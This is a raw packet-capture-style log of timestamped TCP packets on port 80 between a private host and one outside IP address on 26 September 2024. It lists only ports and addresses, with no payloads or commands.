Sep 26, 2024 21:06:06.275012016 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.275043011 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.275043011 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.275079012 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.275090933 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.275129080 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.275162935 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.275180101 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.275197983 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.275245905 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.343420029 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.343467951 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.343523026 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.343532085 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.343583107 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.343616962 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.343638897 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.343667030 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.343699932 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.343718052 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.343729019 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.343760967 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.343781948 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.343792915 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.343825102 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.343842983 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.343877077 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.343909025 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.343929052 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.343946934 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.343981981 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344001055 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.344079971 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344114065 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344136000 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.344146013 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344177961 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344197035 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.344211102 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344243050 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344261885 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.344278097 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344329119 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.344546080 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344578028 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344609976 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344628096 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.344640970 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344674110 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344692945 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.344707012 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344738960 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344759941 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.344769955 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344803095 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344819069 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.344835043 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344867945 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.344885111 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.345048904 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345081091 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345103025 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.345129013 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345165014 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345182896 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.345325947 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345357895 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345391035 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345393896 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.345424891 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345447063 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.345458031 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345489979 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345509052 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.345526934 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345555067 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345577955 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.345793009 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345824957 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345851898 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.345864058 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345900059 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345917940 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.345933914 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345963955 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.345987082 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.345995903 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346028090 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346049070 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.346060038 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346091032 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346113920 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.346122980 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346155882 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346175909 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.346190929 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346240997 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.346539021 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346570969 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346604109 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346622944 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.346635103 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346669912 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346689939 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.346699953 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346733093 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346754074 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.346782923 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346815109 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346833944 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.346846104 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346880913 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346900940 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.346911907 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346946001 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.346966982 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.346977949 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347012043 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347028017 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.347335100 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347362995 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347414017 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.347414970 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347449064 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347467899 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.347480059 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347512960 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347543001 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.347543955 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347575903 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347592115 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.347608089 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347641945 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347660065 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.347672939 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347707033 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347728968 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.347738028 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347769976 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347790003 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.347801924 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347834110 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347853899 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.347865105 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347898960 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.347919941 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.348221064 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.348253012 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.348287106 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.348299980 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.348334074 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.348350048 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.348365068 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.348397970 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.348417044 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.348429918 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.348462105 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.348480940 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.348495007 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.348526955 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.348543882 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.348560095 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.348612070 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.367209911 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.367285013 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.367324114 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.367347956 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.367408037 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.367441893 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.367465973 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.367475033 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.367511034 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.367523909 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.367561102 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.367593050 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.367623091 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.367624044 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.367661953 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.367674112 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.367696047 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.367727995 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.367746115 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.367762089 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.367820024 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.367830992 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.412911892 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.436172962 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.436207056 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.436225891 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.436271906 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.436299086 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.436305046 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.436326027 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.436338902 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.436388969 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.436393976 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.436420918 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.436454058 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.436477900 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.436486006 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.436521053 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.436542988 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.436645031 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.436692953 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.436698914 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.436724901 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.436755896 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.436777115 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.436788082 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.436837912 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.436841011 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.436983109 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437014103 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437045097 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437052965 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.437093973 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437098026 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.437127113 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437160015 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437192917 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.437222958 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437278032 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.437334061 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437365055 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437396049 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437426090 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437428951 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.437458038 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437479019 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.437490940 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437522888 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437541962 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.437557936 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437612057 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.437860966 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437892914 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437923908 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437943935 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.437956095 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.437988043 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.438009977 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.438019991 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.438051939 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.438072920 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.438271999 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.438303947 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.438325882 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.438337088 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.438368082 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.438391924 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.438400030 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.438432932 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.438453913 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.438465118 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.438497066 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.438522100 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.438529968 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.438581944 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.438811064 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.438842058 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.438874006 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.438894033 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.438905954 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.438939095 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.438963890 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.438971996 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439006090 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439023018 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.439035892 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439068079 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439090014 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.439100027 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439131975 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439162970 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439167023 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.439194918 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439215899 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.439225912 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439256907 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439277887 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.439287901 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439321995 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439341068 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.439613104 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439644098 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439668894 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.439768076 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439800978 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439825058 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.439832926 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439867973 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439887047 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.439901114 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439933062 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439954996 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.439965010 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.439996004 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440018892 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.440028906 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440062046 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440079927 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.440092087 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440124035 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440154076 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440155983 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.440186977 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440206051 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.440218925 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440272093 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.440633059 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440665960 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440711975 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440712929 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.440746069 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440776110 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440794945 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.440808058 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440839052 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440861940 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.440870047 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440902948 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440932989 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.440934896 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440963984 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.440989017 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.440994978 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.441030979 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.441047907 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.441063881 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.441097021 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.441117048 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.441128016 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.441159010 CEST	80	49730	147.45.44.131	192.168.2.4
